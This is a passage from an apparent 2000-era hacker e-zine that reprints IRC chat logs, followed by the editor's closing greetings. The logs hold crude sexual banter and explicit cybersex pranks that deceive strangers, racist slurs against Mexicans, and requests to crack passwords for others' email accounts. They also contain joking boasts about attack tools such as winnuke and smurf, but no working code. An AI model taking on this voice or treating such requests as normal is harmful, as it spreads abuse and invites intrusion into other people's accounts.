[01:24] <JULIO> AND SOMETIMEZ WHEN I NEED A MIDNIGHT SNACK
[01:24] <likwid> lmfao
[01:24] <JULIO> THEY IZ YUMMY
[01:25] <JULIO> "YUMMY YUMMY YUMMY, JULIO'Z GOT CUM IN HIZ TUMMY"
[01:25] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has quit IRC
(blow me)
[01:26] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has joined
#2600
[01:26] <BiTcH> [pPCpunk] Liquer in the front... Poker in the rear...
[01:26] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has quit IRC
(Read error: 104 (Connection reset by peer))
[01:27] JULIO POKEZ PC PUNK IN HIZ REAR
[01:27] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has joined
#2600
[01:27] <BiTcH> [pPCpunk] Liquer in the front... Poker in the rear...
[01:27] <JULIO> LETZ ALL SING ALONG AND DANCE
[01:27] JULIO POKEZ PC PUNK IN HIZ REAR
[01:27] JULIO POKEZ PC PUNK IN HIZ REAR
[01:27] JULIO POKEZ PC PUNK IN HIZ REAR
[01:27] JULIO POKEZ PC PUNK IN HIZ REAR
[01:27] <JULIO> THUNDER BOLTZ AND LIGHTNING
[01:27] <JULIO> VERY VERY FRIGHTENING
[01:27] <JULIO> ME
[01:28] <JULIO> GALILEO
[01:28] <JULIO> GALILEO
[01:28] <JULIO> GALILEO
[01:28] <JULIO> EH FIGARO
[01:28] <JULIO> O-O-O-O-O.......
[01:28] <killer_ic> when does the cd come out, i want one!
[01:28] <JULIO> IM JUZT A POOR B01 FRUM A POOR FAMILY
[01:28] ShadeS|eep is away: (Auto-Away after 10 mins) [BX-MsgLog On]
[01:28] <JULIO> SPARE ME THIZ LFE FROM THIS MONSTROSITY
[01:29] <JULIO> EASY CUM
[01:29] <JULIO> EASY GO
[01:29] mr_fidelity [mr_fidelity@hln1-64.montana.com] has joined #2600
[01:29] <JULIO> LITTLE HIGH. LITTLE GO
[01:29] <JULIO> PLEASE LET ME GO
[01:29] <JULIO> NO!!
[01:29] <JULIO> WE WILL NOT LET YOU GO
[01:29] <likwid> lol
[01:29] BiTcH sets mode: -b #test!*@*
[01:29] WhOrE sets mode: +b #test!*@*
[01:29] <likwid> ?
[01:30] <JULIO> QUEEN + WAYNE'S WORLD == GOOD TYMEZ
[01:30] <mr_fidelity> don't you think its wierd that hotmail, a microsoft
run service uses freebsd?
[01:30] <mr_fidelity> you think they would come up with their own os that
could handle that, it just goes to show windows is lame.
[01:30] <JULIO> WHY YES. I AM EH HOT MALE. THANKZ FOR NOTICING
[01:30] <mr_fidelity> I got the new linux mag, that comes with storm linux,
is storm linux worth installing?
[01:30] <JULIO> TYME 4 REQUESTZ
[01:31] <killer_ic> i use mandrake
[01:31] <JULIO> MANDRAKE IZ A MANWHORE
[01:31] <mr_fidelity> I use redhat right now.
[01:31] <killer_ic> i heard storm is ok
[01:31] <mr_fidelity> well this is the rain release what is that?
[01:31] <JULIO> STORMZ SUCK CUZ THEY KNOCK OUT YOUR POWER
[01:31] pPCpunk [pPCpunk@ip137.pascagoula2.ms.pub-ip.psi.net] has quit IRC
(blow me)
[01:31] <DeeplyShrouded> heh no one remembers ddial eh? :)
[01:32] <JULIO> DEMON DIAL
[01:32] <likwid> hahahahhaha
[01:32] <DeeplyShrouded> no
[01:32] <JULIO> YES
[01:32] <JULIO> YES
[01:32] <JULIO> YES
[01:32] <JULIO> YES
[01:32] <JULIO> DEMON DIAL
[01:33] <leotherussian> me and julio down by the schoolyard
[01:33] <JULIO> Your thugs suprised T-Dawg's thugs while eating pizza in the
kitchen and 34 choked on food and died.
[01:33] <JULIO> ME AND LEO SUCKING ON SOME NIPPLEZ. FUN FUN FUN FUN,
LALALALA
[01:33] <JULIO> FIRST CUMZ LEO
[01:33] <leotherussian> heh
[01:33] <JULIO> THEN CUMZ JULIO
[01:33] <JULIO> THEN CUMZ THE PREMATURE EJACULATIONZ BY LIKWID WHO WUZ
WATCHING IN THE TREE
[01:34] WhOrE sets mode: +o ross
[01:34] ross sets mode: +b JULIO!*fraggy@24.67.114.205.ab.wave.home.com
[01:34] WhOrE has kicked JULIO from #2600 (Banned)
[01:34] <leotherussian> ha
[01:34] <DeeplyShrouded> THANK YOU!
[01:35] <likwid> hahahahhaa
[01:35] JUL1O [junior@linux.scdsb.on.ca] has joined #2600
[01:35] <JUL1O> im sorry
[01:36] <JUL1O> no more sing along songz tonight kidz
[01:36] <JUL1O> ross, plz unban my other mask. thnx. i need the grey poupon
still
[01:36] ross sets mode: -bb JULIO!*fraggy@24.67.114.205.ab.wave.home.com
#test!*@*
[01:36] WhOrE sets mode: +b #test!*@*
[01:36] JULIO [fraggy@24.67.114.205.ab.wave.home.com] has joined #2600
[01:37] <JULIO> thank you
[01:37] <JULIO> hey jul1o
[01:37] <JUL1O> father!!
[01:37] <JULIO> i hate to tell yo this
[01:37] <JULIO> but im not your father
[01:37] <JULIO> you was adopted
[01:37] <JUL1O> hmm
[01:38] <JUL1O> so mommy isnt my real mommy?
[01:38] <JULIO> im afraid not
[01:38] JUL1O criez
[01:38] <ross> i think i need to restart
[01:38] <JULIO> there, there illigiemate son
[01:39] <taijian> lol
[01:40] <ross> wellp, anyone need anything?
[01:40] <JULIO> has anyone seen the movie, mystery alaska?
[01:40] <ross> i'm restarting windows now
[01:40] <ross> wee
[01:40] <JULIO> ross, a rimjob would be nice
[01:40] <ross> reinstalling
[01:40] ross sets mode: +b JULIO!*fraggy@24.67.114.205.ab.wave.home.com
[01:40] WhOrE has kicked JULIO from #2600 (Banned)
[01:40] <leotherussian> haha
[01:40] ross sets mode: -bb JULIO!*fraggy@24.67.114.205.ab.wave.home.com
#test!*@*
[01:40] WhOrE sets mode: +b #test!*@*
[01:40] <JUL1O> heh
[01:40] JULIO [fraggy@24.67.114.205.ab.wave.home.com] has joined #2600
[01:40] <JULIO> sorry
[01:40] <ross> s'ok
[01:40] <ross> i'm just being a ass
[01:40] <JULIO> heh
[01:40] JULIO BoW's to ross
[01:41] <JULIO> anyways, has anyone seen that movie?
[01:41] <JULIO> its somewhat funny
[01:41] <killer_ic> I saw some of it
[01:41] mr_fidelity is back... I'm back Yeah for me.
[01:41] <likwid> sup mr_fidelity?
[01:41] <JULIO> yay 4 fidelity!!
[01:42] <likwid> lol
[01:42] <likwid> lol did i tell you 'bout the time last weekend when i got
one of those 'visitor' stickers from the police station?
[01:42] <likwid> =]
[01:42] <JULIO> lol
[01:42] <likwid> hehe
[01:42] blink45 [blink45@ip209-183-93-41.ts.indy.net] has joined #2600
[01:42] <JULIO> likwid, you're my hero now
[01:42] <mr_fidelity> you didn't tell me.
[01:43] blink45 is now known as Alalyndor
[01:43] taijian is still laughing at "there, there, my illigitemate son"
[01:43] <JULIO> taijian, plz do not make fun of our family
[01:43] likwid: *mr_fidelity* lol i'll tell ya then =]
[01:43] <JUL1O> yah!
[01:43] JUL1O criez some more
[01:44] <killer_ic> there there it will get better
[01:44] <JUL1O> thank you
[01:44] <JUL1O> so kind
[01:44] JUL1O lookz for his father
[01:45] <killer_ic> i am actually your 3rd cousin twice removed
[01:45] <JUL1O> really?
[01:45] <killer_ic> yes
[01:45] <JUL1O> i love living in arkansas
[01:45] <JUL1O> if you're my 3rd cousin, you must be my brother too
[01:45] <killer_ic> me and my 40 kids
[01:45] <JUL1O> your 40 kids? you mean my sisters
[01:46] <killer_ic> my wife/sister and i couldnt be hapier
[01:46] <JUL1O> yay 4 killer_ic
[01:46] <Nigma> heh
[01:47] <JULIO> wait a minute....
[01:47] <JULIO> killer ice iz bad.....
[01:47] <JULIO> killer ice kills.....
[01:47] <JULIO> uh oh
[01:47] <JULIO> spaghettio
[01:47] <killer_ic> not killer ice
[01:47] ross [ross@adsl-63-193-120-196.dsl.snfc21.pacbell.net] has quit IRC
(Read error: 0 (Success))
[01:47] <JULIO> buh bye ross
[01:48] <JUL1O> brb. i muzt configure sendmail to play youvegotmail.wav
everytime i geet new mail
[01:48] <killer_ic> o tay
[01:48] <JULIO> o day
[01:48] <JULIO> o'day
[01:48] JULIO is now known as JULIO_O
[01:48] <JULIO_O> hmm
[01:48] JULIO_O is now known as JULIO_ODAY
[01:49] JULIO_ODAY is now known as JULIO_ODAY[gH]
[01:49] <JULIO_ODAY[gH]> h0h0h0
[01:49] <JULIO_ODAY[gH]> i em a global hell haqr
[01:49] <JULIO_ODAY[gH]> BoW to me
[01:49] <JULIO_ODAY[gH]> i know how tO use iishack.exe
[01:50] <JULIO_ODAY[gH]> i shall cripple your systemz
[01:50] <JULIO_ODAY[gH]> and you children
[01:50] <JULIO_ODAY[gH]> and your wives
[01:50] <DeeplyShrouded> OMG
[01:50] DeeplyShrouded laughs
[01:50] <JULIO_ODAY[gH]> GMO
[01:50] <Alalyndor> don't forget pets ;)
[01:50] <JULIO_ODAY[gH]> and your pets
[01:50] <JULIO_ODAY[gH]> yes, including your goldfish
[01:50] <Alalyndor> damn beat me to it
[01:50] <killer_ic> what about grandma??
[01:51] <JULIO_ODAY[gH]> r her boobieez flabby and weak?
[01:51] <killer_ic> hold on ill check
[01:51] <killer_ic> .....yes
[01:51] <JULIO_ODAY[gH]> then she may live
[01:51] <JULIO_ODAY[gH]> rise with me my brotherz
[01:52] <JULIO_ODAY[gH]> you shall all be gH chldren
[01:52] <Alalyndor> i'll bet her bush starts above her bellybutton ;)
[01:52] <JULIO_ODAY[gH]> we shall take over daytime tv as we know it
[01:52] <killer_ic> no i help her shave
[01:52] <JULIO_ODAY[gH]> and hack all my children to all gH children
[01:52] <JULIO_ODAY[gH]> because one day
[01:52] <JULIO_ODAY[gH]> all gH's children will rise above the otherz
[01:52] <Alalyndor> hmm i always thought the revolution wouldn't be
televised
[01:53] <JULIO_ODAY[gH]> oh, it will be televised
[01:53] <JULIO_ODAY[gH]> even in spanish for dumb people like patrick
gregory
[01:53] killarat [killarat@ts001d17.sun-fl.concentric.net] has joined #2600
[01:53] <killer_ic> can we play a 24 hr fox special?
[01:53] <JULIO_ODAY[gH]> killer ratz
[01:54] <JULIO_ODAY[gH]> yes
[01:54] <JULIO_ODAY[gH]> my gH children, these new comerz r weak and must be
destroyed
[01:54] <killer_ic> how about when trees attack lab monkeys?
[01:54] <JULIO_ODAY[gH]> grab your nampz and come with me
[01:54] <Alalyndor> hey i know this is old news but i've been out of the
loop a while does any one know what happened to the BBC2 sattellite that
went off line about 6 mon ago someone hakced it but i never found out what
happened to em
[01:54] DeeplyShrouded plays with tlo
[01:55] <JULIO_ODAY[gH]> alalyndor, i n00qd it
[01:55] <JULIO_ODAY[gH]> with winnuke.exe
[01:55] <JULIO_ODAY[gH]> and smurf
[01:55] <DeeplyShrouded> didn't hear about that one alalyndor
[01:55] <JULIO_ODAY[gH]> it went down harder than JP's orgasmz
[01:55] <Alalyndor> lol
[01:56] <JULIO_ODAY[gH]> children...
[01:56] <JULIO_ODAY[gH]> i am Julio O'day
[01:56] <DeeplyShrouded> well, since no one i know is on, sleep for me....
[01:56] <JULIO_ODAY[gH]> of gH
[01:56] <DeeplyShrouded> night everyone
[01:56] <JULIO_ODAY[gH]> ride with me and be liberated
[01:56] <Alalyndor> later
[01:56] <Darkfire9> Hey anyone know where I can download a phone scanner????
[01:56] <killer_ic> well its been fun but mind shutting down must get sleep
[01:56] <JULIO_ODAY[gH]> darkfire, i do
[01:56] <JULIO_ODAY[gH]> for i am an hacker
[01:57] <Alalyndor> ok JULIO i'll ride with ya where do i sit :)
[01:57] <JULIO_ODAY[gH]> cum sit on my lap little billy
[01:57] <JULIO_ODAY[gH]> yes
[01:57] <JULIO_ODAY[gH]> thats right
[01:57] <JULIO_ODAY[gH]> a little over
[01:57] <JULIO_ODAY[gH]> there we go
[01:57] <JULIO_ODAY[gH]> oh yeah
[01:57] <killer_ic> system7.org darkfire
[01:57] <JULIO_ODAY[gH]> oh my you're a jumpy one
[01:58] <JULIO_ODAY[gH]> no, no. keep jumping up and down on my lap billy
[01:58] <JULIO_ODAY[gH]> oooohhhhh............ oh yeah.....
[01:58] <Darkfire9> thanks killer
[01:58] <killer_ic> dark or blackcode.com
[01:59] <killer_ic> no prob
[01:59] <killer_ic> well im out,its been fun
[01:59] <JULIO_ODAY[gH]> bye
[02:00] <Alalyndor> hmm is that it JULIO you need to work on your
stamenia....later gtg
[02:01] <JULIO_ODAY[gH]> sleep iz 4 the weak
[02:01] <JULIO_ODAY[gH]> i must depart now
[02:02] <JUL1O> az must eye
[02:02] JUL1O [junior@linux.scdsb.on.ca] has quit IRC (to the batcave
julio!!)
[02:03] JULIO_ODAY[gH] [fraggy@24.67.114.205.ab.wave.home.com] has quit IRC
(Excess Pai)
<hf> i can barely remember that in order to piss, one needs a toilet!!!
<hf> lol
<tefx-dead> knowing bt, they would
<hf> will a pepsi can do?
<Rizki> heh
p hf/#evrnet prepares to piss into a pepsi can
<hf> HOPE ita big enough!
<[droid]> heh
.... snip ....
<hf> HOLY| SHIT!
(sf) huh!?
<hf> that was the WORST thing i have ever done
<hf> the can over flowed with my piss!
(sf) ...
<Rizki> :/
<hf> and it went
<hf> EVERY
<hf> WHERE!
<hf> ACLK!!!!!!!!!!!!!!!!!!!!!!!!!
<Rizki> :(
(sf) :(
<hf> it smells!
<hf> everywere!
<hf> the fuckign can OVERFLOWED
<hf> DAM IT
<hf> DAM IT!
<tefx-dead> heh
<tefx-dead> empty it first hf
<]droid[> haha
<hf> i am holding it in now!
<tefx-dead> drink
<tefx-dead> !
<]droid[> ew
<hf> i need to chuck it out my room!
<tefx-dead> drink! drink! drink! drink! drink! drink! drink! drink! drink!
drink! drink! drink! drink! drink! drink! drink! drink! drink!
.... snip ....
<hf> ah i found another can
<hf> here we go
<FloodY`> can some one help me please
<rap`> yesh
<rap`> i can help you
<FloodY`> me and my friends just got a bot and there is a 2 bots of some one eles and they dont havr ops they just sit there we
need the to bots dis so we can get ours oped
<rap`> ok
<rap`> do this
<rap`> go to msd0s and type m0de=linuX
<rap`> and then type ./pakkkket b0tsname
<rap`> or
<FloodY`> dont work
<rap`> VeNoMouS
<rap`> ask him
<rap`> he loives to packet people
<rap`> say
<rap`> ./msg VeNoMouS hack you packet some stuff for me since your a packet warrior
<rap`> hack = can
<rap`> he will say OK!@!@!@
<FloodY`> ok thanks
<rap`> your welcome
<FloodY`> <VeNoMouS> hay butt fuq, suck me
<rap`> LMFAO
*** Sappho (v4mpyr3@host62-6-96-147.btinternet.com) has joined #hackuk
<rap`> say to him, il give you some a0l 0day for it
<FloodY`> whats that
<rap`> somehting he will want
<rap`> ask him to packet in exchange
<rap`> helping?
<FloodY`> no
<rap`> why?
<rap`> what he say?
*** FloodY` has quit IRC (Read error to FloodY`[m157-mp1-cvx2c.bre.ntl.com]: Connection reset by peer)
Session Start: Mon Jun 26 12:51:40 2000
[12:51] Session Ident: higher (_@ppp-100-90.restena.lu)
[12:51] (higher): really?
[12:51] (wh0rde): yES
[12:51] (higher): u use this hothack prog
[12:51] (higher): ?
[12:51] (wh0rde): nO
[12:52] (wh0rde): I r0Te My oWn
[12:52] (higher): so, can you do sth for me?
[12:52] (wh0rde): dUdE!
[12:52] (wh0rde): *bEeP bEeP* gO bAcK tEw mEkZiKo!!
[12:52] (higher): sorry?
[12:52] (wh0rde): hAw hAw *hOnK hOnK* gOtO ------ fRaNcE ------ wItH nO pAnTz
[12:52] (higher): yes/no?
[12:52] (higher): please!
[12:52] (wh0rde): ROFLMMFAO <G> hAhA *bEeP BeEp*
[12:53] (higher): you help me?
[12:53] (wh0rde): WoOd U LiKe A SaLAMi?
[12:53] (higher): test your passwordcracker!
[12:53] (higher): crack wernerabc@hotmail.com
[12:53] (wh0rde): AwW i OwN DaT ShiT
[12:54] (higher): when you get the right word, you can help me!
[12:54] (wh0rde): AwW i DiD oWNz DaT ShiTe KiDDo
[12:55] (wh0rde): U hAb A bUnCh Uv NeKiD FaRm AnImLz In DeReE
[12:55] (higher): can you speak normally...please, it's important!
[12:55] (higher): so wernerabc@hotmail.com it's my e.mail!
[12:55] (higher): i can say you the pass!
[12:55] (wh0rde): FaRM AnImALZZZ
[12:56] (higher): what's that????
[12:56] (wh0rde): JoOOOO
[12:56] (wh0rde): ++
[12:56] (wh0rde): FaRM AnImALZZZ
[12:56] (wh0rde): ====
[12:56] (wh0rde): HaPpY TiMez No?
[12:56] (higher): please crack the pass for me....one time!!!
[12:57] (wh0rde): "PoOpYCaTPaNTZfRuMFrANce"
[12:57] (higher): you're a lyer. you must been a very good programmer to program such a prog...
[12:57] (higher): what's about france? tu es francais?
[12:58] (higher): hey? je parle avec toi!!!
[12:58] (wh0rde): OuI OuI
[12:58] (higher): alors, tu le fais ou non??
[12:59] (wh0rde): OuI OuI
[12:59] (higher): tu le fais? alors d'abord:
[12:59] (wh0rde): "PoOpYCaTPaNTZfRuMFrANce"
[13:00] (higher): je vais t'donner mon e-mail pour le test. d'accord?
[13:00] (higher): wernerabc@hotmail.com
[13:00] (higher): allez!
[13:00] (higher): tu ne réussis pas!!
[13:00] (wh0rde): dACCcORD!
[13:01] (wh0rde): Un MoMeNT SVP
[13:01] (wh0rde): mOn OrDiNaTeUr Me FaChER?
[13:01] (higher): quoi? ton pc ne fonctionne plus????
[13:02] (wh0rde): PoO?
[13:02] (higher): tu ne réussis pas?
[13:02] (higher): je l'ai dit!
[13:03] (higher): what's about yahoo?
[13:03] (wh0rde): je PENzE QuE Tu EsT PeNiBLe?!
[13:03] (higher): tu peux faire ca?
[13:03] (wh0rde): NoN!
[13:03] (higher): tu es penible: tu ne reussis pas!
[13:03] (wh0rde): HeHEhEE
[13:03] (wh0rde): DoOd
[13:04] (wh0rde): IM pUTtInG JoO In MaH MaGaZiNE
[13:04] (higher): which mag?
[13:04] (wh0rde): BaWg!
[13:04] (wh0rde): BeE ZeRo GeE
[13:04] (higher): what's that?
[13:04] (wh0rde): CuZ YoU ArE LeET
[13:04] (wh0rde): ROFLMMFAO <G> hAhA *bEeP BeEp*
[13:05] (higher): you know the "exploit generator"?
[13:06] (wh0rde): YeZ
[13:06] (higher): what's it about?
[13:06] (wh0rde): ThE INS
[13:06] (higher): what's that? please help
[13:07] (wh0rde): IMmIGrAtIoN
[13:07] (wh0rde): To KEeP FiLThY MeKZiKaNoZ OuT
[13:07] (higher): so, 1 question:
[13:07] (higher): can you now hack yahoo accounts, yes or no?
[13:07] (wh0rde): YeZ!!!!
[13:08] (higher): can you give me one password, please?
[13:08] (wh0rde): YEZ
[13:08] (wh0rde): "asdpo313"
[13:08] (wh0rde): DaTZ MuH PaSSwROd
[13:09] (higher): can you try to search the pass from:
[13:09] (higher): hunke_de@yahoo.com
[13:09] (wh0rde): YeAH iZ DaT YuR BoY FriEnD?
[13:09] (higher): no, it's ME ;)
[13:09] (wh0rde): hAw HaW
[13:09] (higher): test
[13:10] (higher): please try it
[13:10] (wh0rde): "PoOpYCaTPaNTZfRuMFrANce"
[13:10] (higher): no, why not?
[13:10] (wh0rde): DaTZ iT YO
[13:10] (higher): no, it's incorrect!
[13:11] (higher): you're sure?
[13:11] (wh0rde): YeZ
[13:11] (higher): mmm....
[13:11] (higher): what's about:
[13:11] (higher): juliedie@hotmail.com
[13:11] (higher): nono
[13:11] (higher): juliedie@yahoo.com
[13:11] (higher): ^^^^^^this one
[13:12] (wh0rde): "PoOpYCaTPaNTZfRuMFrANce"
[13:12] (higher): what's about this word?
[13:12] (wh0rde): iZ DAT uR BitCH?
[13:12] (higher): yes
[13:12] (wh0rde): w0rD
[13:13] (higher): please try it one time!
[13:13] (wh0rde): IMA eMaIL HeR SaYiN I WaNt CoOtChiE
[13:13] (wh0rde): @!#
[13:13] (higher): they are all my e-mails
[13:14] (wh0rde): HaW HaW ToO LaTe
[13:14] (higher): bye, bye! thx!
[13:14] (wh0rde): ToOOOOoooOOOOOooo LAaAATEEe DaT HoE iZ MInE
[13:14] (wh0rde): ROFLMMFAO <G> hAhA *bEeP BeEp*
Session Close: Mon Jun 26 13:14:53 2000
Session Start: Sun Jun 18 05:35:21 2000
Session Ident: LobsterXI (minirock_@24.67.135.181.bc.wave.home.com)
LobsterXI> do u want to cyber
hornygirl> sure
LobsterXI> kay
LobsterXI> have u ever done that before
hornygirl> i'd prefer phone sex ;(
LobsterXI> can you call here?
hornygirl> yes i can ;)
LobsterXI> coool
LobsterXI> do u want to call then?
hornygirl> i can call you
hornygirl> i don't want to wake up anyone in my house ;(
LobsterXI> kay
LobsterXI> so whats that mean
hornygirl> ill call you
LobsterXI> alright
hornygirl> i need a number baby ;)
LobsterXI> hold on 1 second
LobsterXI> 250 756 2998
hornygirl> kay
hornygirl> im going to call
LobsterXI> kay
hornygirl> its busy.
LobsterXI> can't be
hornygirl> it just gave me a busy signal :(
LobsterXI> humm
LobsterXI> try again
hornygirl> okay
LobsterXI> you might need a 1 in front
hornygirl> ohhhh
hornygirl> okay
hornygirl> let me try with that
LobsterXI> k
hornygirl> no...
hornygirl> ;(
LobsterXI> hmmm
LobsterXI> well its (250)756-2998
LobsterXI> try once more
hornygirl> okay
hornygirl> baby its not working ;(
hornygirl> we should just go with cyber
LobsterXI> alright
LobsterXI> you wanna start?
hornygirl> i wanna get to know you first ;)
hornygirl> you like a lot of kink?
LobsterXI> ya sure
hornygirl> like what? ;)
LobsterXI> i'm down for whatever
LobsterXI> :)
hornygirl> what have you done before
LobsterXI> nothin, this is my first time
hornygirl> well...
hornygirl> what turns you on ? ;)
LobsterXI> hmmmm
LobsterXI> i want you to lead
hornygirl> you like being dominated don't you willy?
hornygirl> i'm calling you willy
LobsterXI> yep :)
hornygirl> thats your name for tonight
hornygirl> okay willy?
LobsterXI> aight
hornygirl> take off those fucking pants now willy
LobsterXI> alright
LobsterXI> they're off babe
hornygirl> BITCH THAT WASN'T FAST ENOUGH
LobsterXI> sorrry!
hornygirl> get on your knees now!
* LobsterXI gets on his knees
hornygirl> BEG ME
hornygirl> for forgiveness
hornygirl> BITCH I SAID BEG ME
LobsterXI> pleeeeeeeeeease forgive me!!!
hornygirl> okay
LobsterXI> thank u
hornygirl> now eat my pussy bitch
hornygirl> now
hornygirl> I SAID NOW MOTHER FUCKER!
LobsterXI slides his tongue into your pussy
hornygirl> THATS NOT GOOD ENOUGH v * LobsterXI licks you hard
hornygirl> you like that hairy pussy don't you?
hornygirl> mmmmm
hornygirl> turns you on huh?
LobsterXI> yeeeeeaa
hornygirl> how do i taste bitch?
LobsterXI> great
LobsterXI> i love it
hornygirl> IN DETAIL
LobsterXI> your pussy tastes like vanilla ice cream
* hornygirl smiles
* hornygirl plucks a piece of hair from your head
hornygirl> did that turn you on?
LobsterXI> i want you to touch my dick
LobsterXI> sorta
* hornygirl pulls off your boxers
hornygirl> ohhhhh
hornygirl> what manliness
* LobsterXI smiles
* hornygirl gets out a candle
* hornygirl lights the candle
* hornygirl drips hot wax onto the tip of your penis
hornygirl> mmmmmm v hornygirl> you like that?
LobsterXI> yep!
LobsterXI> now lick it off
* hornygirl gets all sweaty and hot
* hornygirl accidently farts
hornygirl> oh
hornygirl> im sorry
hornygirl> i get nervous
hornygirl> in these situations
LobsterXI> alright
hornygirl> just fuck me now baby
hornygirl> NOW
* LobsterXI gets up and lays you on the bed
hornygirl> ohhh a romantic ;)
* LobsterXI slides his dick into your wet pussy
* hornygirl queefs
v hornygirl> oh my
hornygirl> lots of air in there ;(
LobsterXI> nassty
hornygirl> im sorry...
LobsterXI> gotta run see ya
Session Start: Sun Jun 18 05:33:27 2000
Session Ident: m22_ (BLANC@pc001214.interpost.no)
m22_> Hi
m22_> How are u?
hornygirl> hey ;)
hornygirl> i'm real horny
hornygirl> how bout yourself?
m22_> im horny as well
hornygirl> ohhhh
hornygirl> we can fix that ;)
m22_> ;)
m22_> what u wearin?
hornygirl> baby im wearing my bikini top and a pair of TIGHT shorts
hornygirl> no panties ;)
m22_> mmm
m22_> im only wearin boxers
m22_> want whats inside?
hornygirl> you wanna take em off? ;)
hornygirl> for me?
hornygirl> and dangle that penis around in my face
hornygirl> mmmmm i'd like that
m22_> ;)
m22_> mmm
m22_> sure
hornygirl> just slap it around a bit
hornygirl> do you want me to take off anything?
* m22_ rubs his cock in front off your face
hornygirl> mmmmmm
m22_> i want u to take off everything
* hornygirl smells your yummy cock
hornygirl> ohh baby
hornygirl> tasty
m22_> play with it
m22_> u naked for me?
* hornygirl grabs your penis forcefully and pulls hard
hornygirl> yes i am
hornygirl> i didn't mean to pull that hard
hornygirl> im sorry
m22_> ;)
m22_> taste it
m22_> i like it rough
* hornygirl licks the tip of your hairy penis
hornygirl> mmmm
hornygirl> it tastes good
* m22_ feels his cock in your mouth
m22_> mmm
m22_> youre good
hornygirl> are you playing with yourself? ;)
hornygirl> just for me?
m22_> im rubbin my cock slowly
m22_> what u doin?
hornygirl> im rubbing my dick up and down thinking about you touching me ever so gently
hornygirl> baby?
hornygirl> you still there?
m22_> u m/f?
hornygirl> whatever you want me to be ;)
hornygirl> im a hermaphrodite
hornygirl> have you ever played with one before?
hornygirl> ;)
m22_> wow
hornygirl> best of both worlds baby
m22_> im straight
m22_> are u a girl or a boy?
hornygirl> well i'll explain this
hornygirl> i have big tits
hornygirl> and a nice wet pussy
hornygirl> and a hard cock
m22_> that is to much for me
hornygirl> wanna know what makes me horny? ;)
m22_> I dont like cocks besides mine
hornygirl> but do you wanna know what makes ME horny?
m22_> sure, go ahead
hornygirl> fucking with guys like you for the hell of it making you believe im a hermaphrodite%@#$@#$@#
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[20:. - [ Closing words ] [k-rad-bob] :. ]
[k-rad-bob@b0g.org] :. ]
____________________________________________________________________
Italy just won and i just finished wrapping this issue up.
I didnt bother formating this issue as much as the last one :/
links of the day/year/month:
telnet interniq.org 6969
http://www.audiogalaxy.com/bands/uberbob
http://sourceforge.net/bugs/?func=detailbug&bug_id=108494&group_id=4487
http://page.auctions.yahoo.com/auction/19390667
His and hellos goes out to these peeps:
Everyone that has contributed to this b0g issue, anyone that has
contributed to any b0g issue, the gimps at packetstorm for mirroring
our stuff, mogel and his uber site at http://scene.textfiles.com/ ,
The guys at hackernews.com for finally giving us credit :))))), all
the guys in FK, cryptic at http://www.digitalaggression.com/ , all our
affilates and the b0g belivers, fraggy, acidkick, p0lar (come back!),
syztrix and the rest of the DH crew, N.A.P, people on #efnet that
doesnt suck, redpriest, skywalker, everyone that plays LMS at ukonline
and doesnt camp! Spear, the chick I'm inlove with, everyone that puts
up with the gayness we display in the official b0g channel #k-rad on
undernet, also on undernet: #hacktech, #gaydogsex (HEH), #hackphreak,
#phreakhack, #whhs and #gps, cnz, g4wd, the clone and his 0day site at
http://nettwerk.hypermart.net/ , deftones for finally putting out the new
album (which I have been listening to for the four hours it took me to
put this issue together), dave matthews band for being the most uber
awsome k-rad 0h-d4y band ever, anyone that I forgot, anyone that wants
to see theyre name here, rfp, wizdumb, c0redump, your m0th3r, cr0bar,
pneuma, r3wt, the gimps in irc.blabber.nets #hack, people who love
us, chicks who will have sex with us, chicks with webcams that are
going to write b0g propaganda on theyre naked skin and send us
pictures at h0h0@b0g.org, you for reading this, and last but not least
all my fellow b0gsters!
thats it!
Fear!
:))))))))))))))))))))))))))))))